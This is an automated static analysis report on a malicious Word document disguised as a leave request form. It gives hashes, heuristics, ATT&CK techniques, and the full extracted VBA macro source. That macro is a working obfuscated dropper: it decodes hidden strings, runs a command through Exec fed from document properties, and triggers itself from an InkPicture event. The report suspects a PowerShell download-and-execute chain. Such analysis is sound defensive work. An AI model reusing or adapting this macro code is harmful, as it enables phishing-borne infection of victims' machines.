Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ef0e71f81712afad…

MALICIOUS

Office (OLE)

47.0 KB Created: 2013-12-04 19:48:00 Authoring application: Microsoft Office Word First seen: 2018-02-07
MD5: 4e4621d0e82dc6bfc6e525b381889f42 SHA-1: 0c6449c04b6c6010737a5c5cd1723fd0e9555cf4 SHA-256: ef0e71f81712afad46feb1ee3a36fb3c4093dc6b8d2ae77ea7408ff66a4601e5
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing VBA macros. The macros are obfuscated but contain references to PowerShell and a specific command line argument pattern ('powershell -ep bypass -enc'). This suggests the macro's intent is to download and execute a second-stage payload using PowerShell. The document itself presents a plausible lure (a leave request form) to encourage the user to open it, aligning with a spearphishing attachment attack vector.

Heuristics 6

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    dTuLH2jaP = ActiveDocument.BuiltInDocumentProperties(B8NpRatnPW("w" & Chr(Int("76")) & Chr(Int("108")) & Chr(Int("119")) & Chr(87) & Chr(101) & Chr(Int("114")) & Chr(Int("54")) & Chr(&H66) & Chr(Int("49")) & Chr(119) & Chr(Int("61"))))
Set o7dEZL = CreateObject(B8NpRatnPW("i" & Chr(Int("&H76")) & Chr(Int("&H50")) & "l" & "U" & "u" & Chr(67) & Chr(52) & "d" & Chr(Int("&H68")) & Chr(Int("&H7a")) & Chr(&H53) & Chr(-158 + 271) & Chr(Int("80")) & Chr(1830 - 1764) & Chr(212628 / 2444) & Chr(43) & Chr(80) & Chr(Int("112")) & Chr(&H66) & "X" & Chr(Int("81")) & Chr(Int("61")) & Chr(92964 / 1524)))
With o7dEZL.Exec(B8NpRatnPW("uK3RX6K1WVa4LlpV4CVSF7KjUxngk/9VuO/VWbC/WFawgNhUqKtYEeiP61Soq3pU+MlcTQ=="))
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6188 bytes
SHA-256: dde0ff247460fb963c3f82bfd2301dfcb4dc03e6a8a718b70a5fdae772060c90
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Once As Integer
Public Sub CBiXzh5LXQx()
On Error Resume Next
xQJsGlviy B8NpRatnPW(Chr(54) & Chr(113) & Chr(Int("&H4e")) & Chr(Int("48")) & Chr(88) & Chr(Int("118")) & Chr(&H69) & "s" & Chr(Int("56")) & Chr(1007 - 887) & "X" & Chr(92 - 40) & Chr(Int("54")) & Chr(49) & Chr(&H52) & Chr(&H63)), False
xQJsGlviy B8NpRatnPW(Chr(Int("&H6d")) & Chr(117) & "l" & Chr(&H35) & "V" & Chr(98) & Chr(Int("&H4b")) & Chr(1062 - 950) & Chr(Int("87")) & Chr(82) & Chr(170720 / 2134) & Chr(Int("54")) & Chr(128850 / 2577) & Chr(70) & Chr(&H31) & Chr(&H66)), False
Dim dTuLH2jaP As String
dTuLH2jaP = ActiveDocument.BuiltInDocumentProperties(B8NpRatnPW("w" & Chr(Int("76")) & Chr(Int("108")) & Chr(Int("119")) & Chr(87) & Chr(101) & Chr(Int("114")) & Chr(Int("54")) & Chr(&H66) & Chr(Int("49")) & Chr(119) & Chr(Int("61"))))
Set o7dEZL = CreateObject(B8NpRatnPW("i" & Chr(Int("&H76")) & Chr(Int("&H50")) & "l" & "U" & "u" & Chr(67) & Chr(52) & "d" & Chr(Int("&H68")) & Chr(Int("&H7a")) & Chr(&H53) & Chr(-158 + 271) & Chr(Int("80")) & Chr(1830 - 1764) & Chr(212628 / 2444) & Chr(43) & Chr(80) & Chr(Int("112")) & Chr(&H66) & "X" & Chr(Int("81")) & Chr(Int("61")) & Chr(92964 / 1524)))
With o7dEZL.Exec(B8NpRatnPW("uK3RX6K1WVa4LlpV4CVSF7KjUxngk/9VuO/VWbC/WFawgNhUqKtYEeiP61Soq3pU+MlcTQ=="))
.StdIn.WriteLine dTuLH2jaP
.StdIn.WriteBlankLine 1
.Terminate
End With
End Sub
Private Sub xQJsGlviy(ByVal a7zCi2T As String, ByVal mBsBfRnZ As Boolean)
Dim mONQEAy As Word.Shape
On Error Resume Next
For Each mONQEAy In ActiveDocument.Shapes
If StrComp(mONQEAy.Name, a7zCi2T) = 0 Then
mONQEAy.Delete
Exit For
End If
Next
If mBsBfRnZ Then
ActiveDocument.Save
End If
End Sub
Private Sub InkPicture1_Painted(ByVal Utb7Vp As Long, ByVal fn9j2GM As MSINKAUTLib.IInkRectangle)
If Once < 1 Then
CBiXzh5LXQx
End If
Once = Once + 1
End Sub
Public Function nwQFcIIlZM(ByVal RpjUrGTE9SM As Long, ByVal yRCTh As Byte) As Long
nwQFcIIlZM = RpjUrGTE9SM
If yRCTh > 0 Then
If RpjUrGTE9SM > 0 Then
nwQFcIIlZM = Int(nwQFcIIlZM / (2 ^ yRCTh))
Else
If yRCTh > 31 Then
nwQFcIIlZM = 0
Else
nwQFcIIlZM = nwQFcIIlZM And &H7FFFFFFF
nwQFcIIlZM = Int(nwQFcIIlZM / (2 ^ yRCTh))
nwQFcIIlZM = nwQFcIIlZM Or 2 ^ (31 - yRCTh)
End If
End If
End If
End Function
Public Function nR2MqWNdsR8e(ByVal RpjUrGTE9SM As Long, ByVal yRCTh As Byte) As Long
nR2MqWNdsR8e = RpjUrGTE9SM
If yRCTh > 0 Then
Dim i As Byte
Dim m As Long
For i = 1 To yRCTh
m = nR2MqWNdsR8e And &H40000000
nR2MqWNdsR8e = (nR2MqWNdsR8e And &H3FFFFFFF) * 2
If m <> 0 Then
nR2MqWNdsR8e = nR2MqWNdsR8e Or &H80000000
End If
Next i
End If
End Function
Public Function ssYC(ByVal SD0johicbIO As Long) As Long
Const J9PAcpZKp As Long = 5570645
Const JnfcIhP0joM As Long = 52428
Const d1 = 7
Const d2 = 14
Dim t As Long, u, out As Long
t = (SD0johicbIO Xor nwQFcIIlZM(SD0johicbIO, d2)) And JnfcIhP0joM
u = SD0johicbIO Xor t Xor nR2MqWNdsR8e(t, d2)
t = (u Xor nwQFcIIlZM(u, d1)) And J9PAcpZKp
out = (u Xor t Xor nR2MqWNdsR8e(t, d1))
ssYC = out
End Function
Public Function C21yxJmOCo(ByRef Zjums8() As Byte) As String
Dim i, fr, uttNBkaZX, raw As Long
Dim a As String, b As String, c As String, d As String
Dim nOkju4 As String
Dim ZJ3IRhK() As String
Dim a2, b2 As String
nOkju4 = ""
For i = 0 To (UBound(Zjums8) / 4 + 1)
fr = i * 4
If fr > UBound(Zjums8) Then
Exit For
End If
uttNBkaZX = 0
uttNBkaZX = uttNBkaZX Or nR2MqWNdsR8e(Zjums8(fr + 3), 24)
uttNBkaZX = uttNBkaZX Or nR2MqWNdsR8e(Zjums8(fr + 2), 16)
uttNBkaZX = uttNBkaZX Or nR2MqWNdsR8e(Zjums8(fr + 1), 8)
uttNBkaZX = uttNBkaZX Or Zjums8(fr + 0)
raw = ssYC(uttNBkaZX)
a = Chr(nwQFcIIlZM((raw And &HFF000000), 24))
b = Chr(nwQFcIIlZM((raw And 16711680), 16))
c = Chr(nwQFcIIlZM((raw And 65280), 8))
d = Chr(nwQFcIIlZM((raw And 255), 0))
nOkju4 = nOkju4 + d + c + b + a
Next i
C21yxJmOCo = nOkju4
End Function
Public Function B8NpRatnPW(Zjums8 As String) As String
Dim mUXRavPCb() As Byte, mLpOReLBL() As Byte, arrayByte3(255) As Byte
Dim ZFo4jlRIB(63) As Long, arrayLong5(63) As Long
Dim zx5Wr(63) As Long, fcbgWKZ1oB99 As Long
Dim RJ2okJ1Y As Integer, iter As Long, syVL5HPeB As Long, c0HC0 As Long
Dim nOkju4 As String
Zjums8 = Replace(Zjums8, vbCr, vbNullString)
Zjums8 = Replace(Zjums8, vbLf, vbNullString)
c0HC0 = Len(Zjums8) Mod 4
If InStrRev(Zjums8, "==") Then
RJ2okJ1Y = 2
ElseIf InStrRev(Zjums8, "" + "=") Then
RJ2okJ1Y = 1
End If
For c0HC0 = 0 To 255
Select Case c0HC0
Case 65 To 90
arrayByte3(c0HC0) = c0HC0 - 65
Case 97 To 122
arrayByte3(c0HC0) = c0HC0 - 71
Case 48 To 57
arrayByte3(c0HC0) = c0HC0 + 4
Case 43
arrayByte3(c0HC0) = 62
Case 47
arrayByte3(c0HC0) = 63
End Select
Next c0HC0
For c0HC0 = 0 To 63
ZFo4jlRIB(c0HC0) = c0HC0 * 64
arrayLong5(c0HC0) = c0HC0 * 4096
zx5Wr(c0HC0) = c0HC0 * 262144
Next c0HC0
mLpOReLBL = StrConv(Zjums8, vbFromUnicode)
ReDim mUXRavPCb((((UBound(mLpOReLBL) + 1) \ 4) * 3) - 1)
For iter = 0 To UBound(mLpOReLBL) Step 4
fcbgWKZ1oB99 = zx5Wr(arrayByte3(mLpOReLBL(iter))) + arrayLong5(arrayByte3(mLpOReLBL(iter + 1))) + ZFo4jlRIB(arrayByte3(mLpOReLBL(iter + 2))) + arrayByte3(mLpOReLBL(iter + 3))
c0HC0 = fcbgWKZ1oB99 And 16711680
mUXRavPCb(syVL5HPeB) = c0HC0 \ 65536
c0HC0 = fcbgWKZ1oB99 And 65280
mUXRavPCb(syVL5HPeB + 1) = c0HC0 \ 256
mUXRavPCb(syVL5HPeB + 2) = fcbgWKZ1oB99 And 255
syVL5HPeB = syVL5HPeB + 3
Next iter
nOkju4 = StrConv(mUXRavPCb, vbUnicode)
If RJ2okJ1Y Then nOkju4 = Left$(nOkju4, Len(nOkju4) - RJ2okJ1Y)
B8NpRatnPW = C21yxJmOCo(StrConv(nOkju4, vbFromUnicode))
B8NpRatnPW = nJ9MGKli4gMx(B8NpRatnPW, "~")
End Function
Function nJ9MGKli4gMx(t6wehw As String, bcOAJH84g As String) As String
Dim G7FZOT6z As Long
Dim hyfhjz8G6Tg() As String
hyfhjz8G6Tg = Split(t6wehw, bcOAJH84g)
G7FZOT6z = UBound(hyfhjz8G6Tg, 1)
If G7FZOT6z <> 0 Then
t6wehw = Left$(t6wehw, Len(t6wehw) - G7FZOT6z)
End If
nJ9MGKli4gMx = t6wehw
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.